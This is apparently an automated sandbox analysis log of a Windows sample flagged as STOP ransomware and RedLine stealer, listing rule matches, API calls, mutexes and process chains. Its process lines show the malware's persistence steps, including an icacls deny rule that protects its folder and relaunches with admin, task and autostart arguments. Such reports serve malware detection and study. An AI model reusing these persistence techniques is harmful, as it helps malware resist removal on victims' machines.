          Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3712, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 6372, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 2192, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3804, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7540, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7756, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7820, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@25/977@6/3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,6_2_00411900
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D1119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00D1119F
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021537C6 CreateToolhelp32Snapshot,Module32First,0_2_021537C6
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,6_2_0040D240
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00409030 VerLanguageNameW,SetDefaultCommConfigW,ReadConsoleOutputCharacterA,SetConsoleCursorInfo,GetVersionExA,DebugBreak,SetLastError,SetLastError,FreeResource,VerifyVersionInfoA,BuildCommDCBW,CopyFileExW,GetCompressedFileSizeA,FindNextFileA,SetEvent,FreeResource,VerifyVersionInfoA,GetVersionExA,SetLastError,TerminateProcess,CreateTimerQueueTimer,FillConsoleOutputCharacterA,0_2_00409030
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rarJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5968
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exeJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: --Admin6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: IsAutoStart6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: IsTask6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: --ForNetRes6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: IsAutoStart6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: IsTask6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: --Task6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: --AutoStart6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: --Service6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: X1P6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: --Admin6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: runas6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: x2Q6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: x*P6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: C:\Windows\6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: D:\Windows\6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: 7P6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: %username%6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCommand line argument: F:\6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: wctDE6E.tmp.12.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: wctDE6E.tmp.12.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: wctDE6E.tmp.12.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: wctDE6E.tmp.12.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeReversingLabs: Detection: 95%
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: set-addPolicy
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: id-cmc-addExtensions
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: set-addPolicy
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: id-cmc-addExtensions
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: set-addPolicy
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: id-cmc-addExtensions
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: set-addPolicy
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile read: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe"
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\Temp\HhVfIB.exe C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe"
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1572
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
          Source: unknownProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --Task
          Source: unknownProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\Temp\HhVfIB.exe C:\Users\user~1\AppData\Local\Temp\HhVfIB.exeJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
